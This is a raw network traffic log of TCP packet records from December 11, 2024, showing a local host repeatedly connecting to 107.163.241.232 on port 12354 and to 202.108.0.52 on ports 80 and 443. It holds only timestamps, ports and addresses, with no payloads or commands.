Dec 11, 2024 16:28:53.614665031 CET	54740	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.615984917 CET	54740	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.616554022 CET	54806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.734000921 CET	12354	54740	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.735444069 CET	12354	54740	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.735868931 CET	12354	54806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.735941887 CET	54806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.739537954 CET	54806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.855429888 CET	12354	54806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.855758905 CET	54806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.858938932 CET	12354	54806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.893903017 CET	54806	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.895584106 CET	55003	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.975924969 CET	12354	54806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.015073061 CET	12354	54806	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.015103102 CET	12354	55003	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.015249968 CET	55003	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.035545111 CET	55003	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.135034084 CET	12354	55003	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.135123968 CET	55003	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.136173010 CET	55003	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.136173964 CET	55032	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.154989958 CET	12354	55003	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.255368948 CET	12354	55003	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.255877018 CET	12354	55003	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.255891085 CET	12354	55032	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.255964994 CET	55032	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.270514011 CET	55032	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.376204014 CET	12354	55032	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.376554966 CET	55032	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.376817942 CET	55032	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.377389908 CET	55298	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.392167091 CET	12354	55032	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.496108055 CET	12354	55032	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.496306896 CET	12354	55032	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.496714115 CET	12354	55298	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.496798038 CET	55298	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.497065067 CET	55298	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.616436958 CET	12354	55298	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.616446972 CET	12354	55298	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.616497993 CET	55298	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.625046015 CET	55298	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.625606060 CET	55606	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.711877108 CET	443	54642	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:54.711954117 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.712655067 CET	443	54642	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:54.712727070 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.716165066 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.716506958 CET	443	54642	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:54.716573954 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.737341881 CET	12354	55298	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.745846987 CET	12354	55298	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.745861053 CET	12354	55606	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.746028900 CET	55606	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.746378899 CET	55606	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.793222904 CET	55606	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.793325901 CET	54683	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.794019938 CET	55816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.823339939 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.823663950 CET	55832	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.865619898 CET	12354	55606	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.865726948 CET	55606	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.903017044 CET	55881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.913269997 CET	12354	55816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:54.913383961 CET	55816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.916773081 CET	55816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:54.943100929 CET	80	55832	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:54.943121910 CET	80	53081	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:54.943192959 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.943223000 CET	55832	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:54.944047928 CET	55832	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.022748947 CET	12354	55881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.022806883 CET	55881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.026305914 CET	55881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.032943964 CET	12354	55816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.032996893 CET	55816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.033732891 CET	55816	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.034101009 CET	55955	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.040399075 CET	12354	55816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.064996958 CET	80	55832	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.065197945 CET	55832	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.065713882 CET	55832	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.065768003 CET	80	55832	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.143596888 CET	12354	55881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.143810987 CET	55881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.144727945 CET	55881	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.146744967 CET	12354	55881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.153595924 CET	12354	55816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.153618097 CET	12354	55816	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.154078960 CET	12354	55955	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.154196024 CET	55955	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.154582977 CET	56098	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.154864073 CET	55955	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.185002089 CET	80	55832	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.187016010 CET	80	55832	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.265002012 CET	12354	55881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.265938044 CET	12354	55881	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.274945974 CET	12354	55955	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.274959087 CET	12354	56098	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.275021076 CET	55955	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.275054932 CET	12354	55955	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.275073051 CET	56098	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.321759939 CET	55955	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.321952105 CET	56098	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.394468069 CET	12354	55955	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.409441948 CET	12354	56098	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.409522057 CET	56098	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.414937973 CET	56098	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.441797018 CET	12354	55955	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.441834927 CET	12354	56098	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.540167093 CET	12354	56098	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.542478085 CET	12354	56098	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.542906046 CET	56117	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.568361044 CET	56118	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.629795074 CET	56120	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.662632942 CET	12354	56117	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.662725925 CET	56117	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.674498081 CET	56117	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.687644958 CET	80	56118	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.687726021 CET	56118	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.718442917 CET	56118	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.749150991 CET	12354	56120	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.749258995 CET	56120	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.767976999 CET	56120	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.782250881 CET	12354	56117	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.782351017 CET	56117	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.793955088 CET	12354	56117	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.807833910 CET	80	56118	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.807905912 CET	56118	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.814795971 CET	56117	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.816227913 CET	56123	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.837713957 CET	80	56118	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.855153084 CET	56118	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:55.868838072 CET	12354	56120	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.868916035 CET	56120	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.887522936 CET	12354	56120	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.901583910 CET	12354	56117	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.915152073 CET	56120	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.927109957 CET	80	56118	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.934015036 CET	12354	56117	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.935506105 CET	12354	56123	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:55.935818911 CET	56123	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.974941969 CET	80	56118	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:55.987410069 CET	56123	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:55.988580942 CET	12354	56120	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.034733057 CET	12354	56120	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.055716991 CET	12354	56123	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.055783033 CET	56123	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.107300043 CET	12354	56123	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.115406990 CET	56123	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.152283907 CET	56128	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.152908087 CET	56129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.153481960 CET	56130	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.174952030 CET	12354	56123	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.234659910 CET	12354	56123	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.271517992 CET	80	56128	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:56.271692991 CET	56128	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.272458076 CET	56128	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.274858952 CET	12354	56129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.274884939 CET	12354	56130	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.274954081 CET	56130	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.274983883 CET	56129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.276047945 CET	56129	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.276187897 CET	56130	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.393790007 CET	80	56128	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:56.398639917 CET	12354	56129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.398683071 CET	12354	56130	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.409254074 CET	80	56128	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:56.409812927 CET	12354	56130	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.410026073 CET	12354	56129	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.410711050 CET	56326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.534486055 CET	12354	56326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.534934044 CET	56326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.535466909 CET	56326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.547972918 CET	56486	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.552651882 CET	56489	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.658570051 CET	12354	56326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.658627987 CET	56326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.658648968 CET	12354	56326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.671243906 CET	12354	56486	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:56.671892881 CET	56486	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.671910048 CET	56326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.672168970 CET	56587	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.672432899 CET	56486	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:56.675344944 CET	80	56489	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:56.675484896 CET	56489	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.676249027 CET	56489	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:56.959048986 CET	12354	56326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.071180105 CET	12354	56326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.071192980 CET	12354	56587	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.071203947 CET	12354	56486	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.071213961 CET	12354	56486	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.071249962 CET	80	56489	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.071259975 CET	80	56489	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.071299076 CET	56587	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.071332932 CET	56489	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:57.077896118 CET	56587	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.078721046 CET	56954	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.078985929 CET	56489	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:57.193476915 CET	80	56489	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.198218107 CET	12354	56587	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.198229074 CET	12354	56954	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.198251009 CET	80	56489	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.198314905 CET	56954	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.198513031 CET	56954	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.233129978 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:57.317931890 CET	12354	56954	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.318455935 CET	12354	56954	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.323201895 CET	57316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.353704929 CET	80	57204	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.353802919 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:57.366374016 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:57.442488909 CET	12354	57316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:57.442589045 CET	57316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.442940950 CET	57316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:57.485934973 CET	80	57204	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:57.563008070 CET	12354	57316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:58.941871881 CET	80	57204	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:58.941926956 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:58.947031975 CET	58722	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:58.947078943 CET	443	58722	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:58.947130919 CET	58722	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:58.947437048 CET	58722	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:58.947452068 CET	443	58722	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:59.191888094 CET	12354	56587	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.191951036 CET	56587	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.192352057 CET	56587	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.192698956 CET	58940	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.311876059 CET	12354	56587	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.312181950 CET	12354	58940	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.312325001 CET	58940	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.312712908 CET	58940	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.432065010 CET	12354	58940	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.553117990 CET	12354	57316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.553968906 CET	57316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.553968906 CET	57316	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.554260015 CET	59328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.674173117 CET	12354	57316	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.674257040 CET	12354	59328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:59.674808025 CET	59328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.676155090 CET	59328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:59.795514107 CET	12354	59328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.538480997 CET	58722	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.538494110 CET	58940	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.538501978 CET	59328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.539038897 CET	60163	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.658371925 CET	12354	60163	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.658528090 CET	60163	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.666357994 CET	60163	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.704771042 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.705259085 CET	60262	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.705594063 CET	60263	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.778493881 CET	12354	60163	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.779572010 CET	60163	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.781624079 CET	60163	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.782385111 CET	60344	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.786181927 CET	12354	60163	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.824634075 CET	80	57204	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:00.824650049 CET	80	60262	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:00.824692965 CET	57204	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.824743032 CET	60262	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.824932098 CET	12354	60263	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.824969053 CET	60262	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:00.825000048 CET	60263	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.825886011 CET	60263	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.899032116 CET	12354	60163	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.901501894 CET	12354	60163	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.901995897 CET	12354	60344	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.902216911 CET	60344	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.902612925 CET	60344	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.944334984 CET	80	60262	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:00.944483042 CET	80	60262	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:00.944843054 CET	12354	60263	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.944880962 CET	60263	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.945106983 CET	12354	60263	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:00.945386887 CET	60263	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:00.945744038 CET	60528	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.022193909 CET	12354	60344	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.022206068 CET	12354	60344	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.022255898 CET	60344	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.022933006 CET	60344	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.058568954 CET	60660	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.061945915 CET	60661	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.064176083 CET	12354	60263	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.064851999 CET	12354	60263	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.065174103 CET	12354	60528	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.065453053 CET	60528	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.067414045 CET	60528	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.142477036 CET	12354	60344	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.143115044 CET	12354	60344	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.179440975 CET	12354	60660	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.179788113 CET	60660	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.183434010 CET	80	60661	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.183559895 CET	60661	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.186580896 CET	60660	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.187015057 CET	12354	60528	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.187079906 CET	60528	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.188188076 CET	12354	60528	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.188353062 CET	60661	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.188436985 CET	60528	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.189090014 CET	60698	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.299369097 CET	12354	60660	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.299545050 CET	60660	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.300003052 CET	60660	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.303488970 CET	80	60661	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.303601027 CET	60661	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.304615974 CET	60661	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.305876970 CET	12354	60660	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.306268930 CET	12354	60528	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.307616949 CET	80	60661	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.307640076 CET	60797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.307683945 CET	12354	60528	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.308450937 CET	12354	60698	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.308589935 CET	60698	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.309262991 CET	60698	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.417974949 CET	60922	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.419225931 CET	12354	60660	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.419238091 CET	12354	60660	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.423274040 CET	80	60661	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.424184084 CET	80	60661	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.427792072 CET	12354	60797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.427871943 CET	60797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.428417921 CET	60797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.428740025 CET	12354	60698	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.428807974 CET	60698	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.429189920 CET	12354	60698	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.429759979 CET	60698	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.430042982 CET	60939	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.537659883 CET	80	60922	202.108.0.52	192.168.2.7
Dec 11, 2024 16:29:01.537739038 CET	60922	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.541712046 CET	60922	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:29:01.547899961 CET	12354	60797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.547910929 CET	12354	60797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:29:01.547998905 CET	60797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:29:01.548311949 CET	60797	12354	192.168.2.7	107.163.241.232
